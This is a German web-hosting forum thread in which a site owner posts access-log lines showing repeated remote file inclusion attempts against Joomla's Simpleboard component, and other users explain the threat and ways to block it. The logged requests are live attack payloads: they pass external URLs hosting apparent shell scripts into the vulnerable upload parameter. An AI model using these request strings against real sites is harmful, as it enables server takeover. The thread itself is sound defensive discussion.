Thema geschlossen
Seite 1 von 3 1 2 3 LetzteLetzte
Ergebnis 1 bis 10 von 25

Thema: Dreister Hackversuch über Simpleboard

  1. #1
    Neu an Board
    Registriert seit
    08.07.2004
    Beiträge
    25
    Bedankte sich
    4
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Dreister Hackversuch über Simpleboard

    Hallo!

    Ich habe heute mal aus Jux und Dollerei meine Logfiles durchgeschaut und bin auf folgendes gestoßen:

    202.8.87.211 - - [03/Oct/2006:00:29:17 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://foro-bot.webcindario.com/baba.txt? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" ""

    193.138.221.190 - - [03/Oct/2006:01:15:27 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

    80.237.132.50 - - [03/Oct/2006:01:15:27 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

    85.214.16.102 - - [03/Oct/2006:01:15:28 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

    62.168.63.142 - - [03/Oct/2006:01:15:29 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.65" ""

    62.214.98.109 - - [03/Oct/2006:01:16:07 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" ""

    80.228.203.99 - - [03/Oct/2006:01:16:08 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

    216.237.124.18 - - [03/Oct/2006:01:16:12 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" "

    80.228.203.99 - - [03/Oct/2006:01:16:32 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" "

    72.22.71.81 - - [03/Oct/2006:01:16:55 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.76" "

    209.59.156.2 - - [03/Oct/2006:01:17:00 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" "

    204.92.122.105 - - [03/Oct/2006:01:17:00 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.65" "

    69.42.69.208 - - [03/Oct/2006:01:17:01 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" "

    209.59.152.2 - - [03/Oct/2006:01:17:03 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" "

    212.57.234.27 - - [03/Oct/2006:01:17:05 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.65" ""

    72.21.41.146 - - [03/Oct/2006:01:17:09 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" "

    201.12.156.20 - - [03/Oct/2006:01:17:10 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" ""

    209.59.156.2 - - [03/Oct/2006:01:17:11 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" ""

    209.249.12.7 - - [03/Oct/2006:01:17:13 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

    80.237.132.50 - - [03/Oct/2006:01:17:14 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

    80.237.132.50 - - [03/Oct/2006:01:17:18 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

    212.128.15.42 - - [03/Oct/2006:01:17:23 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" ""
    Da ich das Simpleboard nicht habe, hatte er natürlich keinen Erfolg. Aber interessant zu sehen, wie hartnäckig da versucht wird irgendwas hochzuladen. Schön im 2 Sekunden Takt. Weiss einer was das überhaupt bewirken soll?

    Bis jetzt kam kein weiterer Angriff auf das Simpleboard.

    Einen schönen Morgen noch!!

    Gruß,
    billalein

  2. #2
    War schon öfter hier
    Registriert seit
    01.10.2006
    Beiträge
    154
    Bedankte sich
    3
    Erhielt 22 Danksagungen
    in 22 Beiträgen

    Standard

    Zitat Zitat von billalein Beitrag anzeigen

    Da ich das Simpleboard nicht habe, hatte er natürlich keinen Erfolg. Aber interessant zu sehen, wie hartnäckig da versucht wird irgendwas hochzuladen. Schön im 2 Sekunden Takt. Weiss einer was das überhaupt bewirken soll?

    Gruß,
    billalein
    Im Erfolgsfall hättest Du jetzt eine php-shell und andere Leckereien auf Deinem Space, die beliebige Manipulation, im Extremfall (schlecht konfigurierter Server) root-Zugriff aufs komplette System ermöglichen.

  3. #3
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    libwww über .htaccess sperren, sofern keine legalen Perl-Scripts auf Deinen Sapce zugreifen wollen. Ist immer dieselbe Masche.

  4. #4
    Neu an Board
    Registriert seit
    14.08.2006
    Ort
    Brühl (Baden)
    Beiträge
    18
    Bedankte sich
    4
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Hat denn auch jemand eine Idee, was ich tun kann, wenn mein Hoster mod_rewrite nicht erlaubt?
    (Hab zwar nicht Simpleboard installiet, aber die ständigen libWWW-Angriffe will ich doch gern vermeiden.)

    Gruß,
    Friedel

  5. #5
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Dein Hoster erlaubt kein mod_rewrite und Du willst Joomla einsetzen?
    Hm... nicht lange fackeln. Joomlafähigen Webspace besorgen.

    Zu Deiner Frage: hier mal lesen.

  6. Erhielt Danksagungen von:


  7. #6
    Neu an Board
    Registriert seit
    14.08.2006
    Ort
    Brühl (Baden)
    Beiträge
    18
    Bedankte sich
    4
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Dannke für den Tip zu Bot-Trap. Habe mich mal gleich registriert.

    Und einen Hoster-Wechsel muß ich wohl eh bald in Angriff nehmen, da mein derzeitiger fast mehr Down- als Up-Time hat.
    ... war halt preiswert bei einem umfangreichem Paket ...

    Gruß,
    Friedel

  8. #7
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Zitat Zitat von Friedel Beitrag anzeigen
    ... war halt preiswert bei einem umfangreichem Paket ...
    ...das teuerste ist billiges Werkzeug.

  9. #8
    chw
    chw ist offline
    Verbringt hier viel Zeit
    Registriert seit
    06.08.2006
    Beiträge
    832
    Bedankte sich
    2
    Erhielt 164 Danksagungen
    in 152 Beiträgen

    Standard

    Zitat Zitat von billalein Beitrag anzeigen
    Hallo!

    Ich habe heute mal aus Jux und Dollerei meine Logfiles durchgeschaut und bin auf folgendes gestoßen:
    [...]
    Willkommen in der Realität ;-)

    Damit wirst Du als Betreiber einer joomla Seite immer zu tun haben.
    Je nach bekanntheitsgrad mal mehr und mal weniger.
    Ein "tail -1500 access_log | grep "=http:" " bringt bei mir manchmal bis zu 200 Versuche. Je nach dem ob gerade Wochennde ist oder Schulferien sind.
    Das sind automatisierte Abfragen meistens werden die Seiten aus Listen heraus aufgerufen die von Suchmaschinen stammen.
    Wenn joomla aktuell ist und der Server richtig eingerichtet funktioniert diese Masche nicht mehr. Auch ein grund - wenn nicht DER Grund überhaupt warum man joomla auf dafür optimiertem Webspace laufen lassen sollte. Auch wenns einige cent mehr im Mona t sind.

    Edit: Logs ließt man nicht aus "jux und dollerei" - das macht man regelmäßig. Auch wenns keinen Spass macht.
    Mit einigen Tools kann man sich die Arbeit allerdings erleichtern. Die meisten sind bei Linux übrigends schon mit dabei.

  10. #9
    Neu an Board
    Registriert seit
    08.07.2004
    Beiträge
    25
    Bedankte sich
    4
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Hallo!

    Durch einen Hosterwechsel sind sogut wie keine Angriffe mehr zu verzeichnen. Anscheinend lag es auch an der Serverconfig.

    Wollen wir hoffen das es auch so bleibt!

  11. #10
    Neu an Board Avatar von mammamaria
    Registriert seit
    12.08.2006
    Beiträge
    26
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    das ist auch meine frage,

    wie stellt man die configuration ein, damit alles schön dicht ist.
    ich kenne mich nicht aus und hab auch keine ahnung von tiny editor,
    htaccess. als webhosting bin ich bei 1&1. ich habe die seite erst vor
    zwei tagen online gestellt und müsste sie jetzt mal richtig einstellen,
    damit diese manipulation da nicht greift.

    wer kann mir helfen, quasi schritt für schritt

Thema geschlossen
Seite 1 von 3 1 2 3 LetzteLetzte

Ähnliche Themen

  1. Simpleboard 1.1.0 wird nicht gefunden?
    Von BarnaMedia im Forum Mambo Module
    Antworten: 1
    Letzter Beitrag: 20.02.2006, 17:18
  2. Hilfedatei bei Simpleboard entfernen
    Von neontiger im Forum Joomla Komponenten
    Antworten: 1
    Letzter Beitrag: 30.10.2005, 10:55
  3. Simpleboard sehr langsam
    Von n!c3 im Forum Mambo Komponenten
    Antworten: 0
    Letzter Beitrag: 28.10.2005, 17:52
  4. SimpleBoard + Einstellungen im Backend
    Von micweg im Forum Mambo Komponenten
    Antworten: 0
    Letzter Beitrag: 09.07.2005, 21:14
  5. Simpleboard 1.03 - Darstellung
    Von Pinker im Forum Mambo Komponenten
    Antworten: 11
    Letzter Beitrag: 30.10.2004, 16:51

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein